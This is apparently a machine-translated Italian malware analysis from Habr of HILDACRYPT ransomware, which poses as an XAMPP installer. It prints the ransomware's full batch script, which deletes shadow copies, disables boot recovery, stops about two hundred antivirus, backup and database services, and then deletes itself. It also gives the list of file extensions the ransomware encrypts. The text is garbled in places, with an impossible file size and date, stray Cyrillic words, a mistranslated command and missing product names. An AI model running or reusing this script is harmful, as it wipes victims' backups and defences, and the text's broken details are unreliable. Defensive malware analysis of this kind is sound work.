Ciao, Habr! Ancora una volta stiamo parlando delle ultime versioni di malware della categoria Ransomware. HILDACRYPT è un nuovo ransomware, un membro della famiglia Hilda scoperto nell'agosto 2019, che prende il nome dal cartone animato Netflix utilizzato per distribuire il software. Oggi conosceremo le caratteristiche tecniche di questo virus ransomware aggiornato.
Nella prima versione del ransomware Hilda, un collegamento a quello pubblicato su Youtube serie di cartoni animati era contenuta nella lettera di riscatto. HILDACRYPT si maschera da legittimo programma di installazione XAMPP, una distribuzione Apache facile da installare che include MariaDB, PHP e Perl. Allo stesso tempo, il cryptolocker ha un nome file diverso: xamp. Inoltre, il file ransomware non ha una firma elettronica.
Analisi statica
Il ransomware è contenuto in un file PE32 .NET scritto per MS Windows. La sua dimensione è 135 byte. Sia il codice del programma principale che il codice del programma difensore sono scritti in C#. Secondo la data di compilazione e il timestamp, il file binario è stato creato il 168 settembre 14.
Secondo Detect It Easy, il ransomware viene archiviato utilizzando Confuser e ConfuserEx, ma questi offuscatori sono gli stessi di prima, solo ConfuserEx è il successore di Confuser, quindi le loro firme dei codici sono simili.
HILDACRYPT è infatti confezionato con ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vettore di attacco
Molto probabilmente, il ransomware è stato scoperto su uno dei siti di programmazione web, mascherato da programma XAMPP legittimo.
L'intera catena dell'infezione può essere vista in .
Offuscazione
Le stringhe del ransomware vengono archiviate in forma crittografata. Una volta avviato, HILDACRYPT li decrittografa utilizzando Base64 e AES-256-CBC.
Installazione
Innanzitutto il ransomware crea una cartella in %AppDataRoaming% nella quale viene generato in modo casuale il parametro GUID (Globally Unique Identifier). Aggiungendo un file bat in questa posizione, il virus ransomware lo avvia utilizzando cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & esci
Quindi avvia l'esecuzione di uno script batch per disabilitare funzionalità o servizi del sistema.
Lo script contiene un lungo elenco di comandi che distruggono le copie shadow, disabilitano il server SQL, le soluzioni di backup e antivirus.
Ad esempio, tenta senza successo di arrestare i servizi Acronis Backup. Inoltre, attacca i sistemi di backup e le soluzioni antivirus dei seguenti fornitori: Veeam, Sophos, Kaspersky, McAfee e altri.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Una volta disabilitati i servizi e i processi sopra menzionati, il cryptolocker raccoglie informazioni su tutti i processi in esecuzione utilizzando il comando tasklist per garantire che tutti i servizi necessari siano inattivi.
elenco attività v/fo csv
Questo comando visualizza un elenco dettagliato dei processi in esecuzione, i cui elementi sono separati dal segno "",.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Dopo questo controllo, il ransomware avvia il processo di crittografia.
Шифрование
Crittografia dei file
HILDACRYPT esamina tutti i contenuti trovati dei dischi rigidi, ad eccezione delle cartelle Recycle.Bin e Reference AssembliesMicrosoft. Quest'ultimo contiene file dll, pdb, ecc. critici per le applicazioni .Net che possono influenzare il funzionamento del ransomware. Per cercare i file che verranno crittografati, viene utilizzato il seguente elenco di estensioni:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Il ransomware utilizza l'algoritmo AES-256-CBC per crittografare i file dell'utente. La dimensione della chiave è 256 bit e la dimensione del vettore di inizializzazione (IV) è 16 byte.
Nello screenshot seguente, i valori di byte_2 e byte_1 sono stati ottenuti in modo casuale utilizzando GetBytes().
Chiave
WI
Il file crittografato ha l'estensione HCY!.. Questo è un esempio di file crittografato. La chiave e l'IV sopra menzionate sono state create per questo file.
Crittografia della chiave
Il cryptolocker memorizza la chiave AES generata in un file crittografato. La prima parte del file crittografato ha un'intestazione che contiene dati come HILDACRYPT, KEY, IV, FileLen in formato XML e assomiglia a questa:
La crittografia con chiave AES e IV viene eseguita utilizzando RSA-2048 e la codifica viene eseguita utilizzando Base64. La chiave pubblica RSA è archiviata nel corpo del cryptolocker in una delle stringhe crittografate in formato XML.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
Per crittografare la chiave del file AES viene utilizzata una chiave pubblica RSA. La chiave pubblica RSA è codificata Base64 ed è composta da un modulo e un esponente pubblico 65537. La decrittografia richiede la chiave privata RSA di cui dispone l'aggressore.
Dopo la crittografia RSA, la chiave AES viene codificata utilizzando Base64 archiviato nel file crittografato.
Messaggio di riscatto
Una volta completata la crittografia, HILDACRYPT scrive il file html nella cartella in cui ha crittografato i file. La notifica del ransomware contiene due indirizzi email dove la vittima può contattare l'aggressore.
L'avviso di estorsione contiene anche la riga "No loli è sicuro;)" - un riferimento a personaggi di anime e manga con le sembianze di bambine vietate in Giappone.
conclusione
HILDACRYPT, una nuova famiglia di ransomware, ha rilasciato una nuova versione. Il modello di crittografia impedisce alla vittima di decrittografare i file crittografati dal ransomware. Cryptolocker utilizza metodi di protezione attiva per disabilitare i servizi di protezione relativi ai sistemi di backup e alle soluzioni antivirus. L'autore di HILDACRYPT è un fan della serie animata Hilda mostrata su Netflix, il cui link al trailer era contenuto nella lettera di buyout della versione precedente del programma.
Normalmente, и può proteggere il tuo computer dal ransomware HILDACRYPT e i fornitori hanno la capacità di proteggere i propri clienti con . La protezione è assicurata dal fatto che queste soluzioni includono include non solo il backup, ma anche il nostro sistema di sicurezza integrato - Alimentata da un modello di apprendimento automatico e basata sull'euristica comportamentale, una tecnologia in grado di contrastare la minaccia del ransomware zero-day come nessun'altra.
Indicatori di compromesso
Estensione del file HCY!
HILDACRYPTLeggimi.html
xamp.exe con una lettera "p" e nessuna firma digitale
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Fonte: habr.com